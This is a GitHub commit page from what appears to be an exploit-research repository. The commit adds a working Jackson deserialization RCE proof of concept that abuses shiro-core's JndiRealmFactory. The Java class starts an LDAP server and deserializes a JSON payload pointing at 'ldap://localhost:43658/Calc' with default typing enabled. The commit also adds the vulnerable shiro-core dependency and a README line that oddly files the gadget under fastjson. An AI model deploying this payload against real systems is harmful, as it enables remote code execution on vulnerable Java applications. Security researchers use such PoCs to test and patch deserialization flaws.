Skip to content

Commit 6d89b02

Browse files
author
“threedr3am”
committed
feat:添加jackson shiro-core gadget
1 parent 1bc037f commit 6d89b02

File tree

3 files changed

+48
-0
lines changed

3 files changed

+48
-0
lines changed

README.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -13,6 +13,7 @@ package:com.threedr3am.bug.fastjson.rce
1313
5. com.threedr3am.bug.fastjson.rce.JndiConverterPoc(JndiConverter) 利用条件:fastjson <= 1.2.62 RCE,需要开启AutoType
1414
6. com.threedr3am.bug.fastjson.rce.HadoopHikariPoc(HikariConfig) 利用条件:fastjson <= 1.2.62 RCE,需要开启AutoType
1515
7. com.threedr3am.bug.fastjson.rce.IbatisSqlmapPoc(JtaTransactionConfig) 利用条件:fastjson <= 1.2.62 RCE,需要开启AutoType
16+
8. com.threedr3am.bug.fastjson.rce.ShiroPoc(shiro-core) 利用条件:fastjson <= 1.2.66 RCE,需要开启AutoType
1617

1718
##### SSRF
1819
package:com.threedr3am.bug.fastjson.ssrf

jackson/pom.xml

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -120,6 +120,12 @@
120120
<artifactId>ibatis-sqlmap</artifactId>
121121
<version>2.3.4.726</version>
122122
</dependency>
123+
124+
<dependency>
125+
<groupId>org.apache.shiro</groupId>
126+
<artifactId>shiro-core</artifactId>
127+
<version>1.5.1</version>
128+
</dependency>
123129
</dependencies>
124130

125131
</project>

jackson/src/main/java/com/threedr3am/bug/jackson/rce/ShiroPoc.java

Lines changed: 41 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,41 @@
1+
package com.threedr3am.bug.jackson.rce;
2+
3+
import com.fasterxml.jackson.databind.ObjectMapper;
4+
import com.threedr3am.bug.common.server.LdapServer;
5+
import java.io.IOException;
6+
7+
/**
8+
* 比较鸡肋,需要调用writeValueAsString才能触发,因为Collection<Realm> getRealms()的返回值虽然是Collection,
9+
* 但是貌似是因为有泛型子类型导致值解析使用AsArrayTypeDeserialize,然后getter的invoke之前判断不为空就抛异常了
10+
*
11+
* shiro-core gadget
12+
*
13+
* <dependency>
14+
* <groupId>org.apache.shiro</groupId>
15+
* <artifactId>shiro-core</artifactId>
16+
* </dependency>
17+
*
18+
* @author threedr3am
19+
*/
20+
public class ShiroPoc {
21+
22+
static {
23+
//rmi server示例
24+
// RmiServer.run();
25+
26+
//ldap server示例
27+
LdapServer.run();
28+
}
29+
30+
public static void main(String[] args) throws IOException {
31+
ObjectMapper mapper = new ObjectMapper();
32+
mapper.enableDefaultTyping();
33+
34+
String json = "[\"org.apache.shiro.realm.jndi.JndiRealmFactory\", {\"jndiNames\": \"ldap://localhost:43658/Calc\"}]";
35+
System.out.println(json.charAt(65));
36+
Object o = mapper.readValue(json, Object.class);
37+
mapper.writeValueAsString(o);
38+
}
39+
40+
41+
}

0 commit comments

Comments
 (0)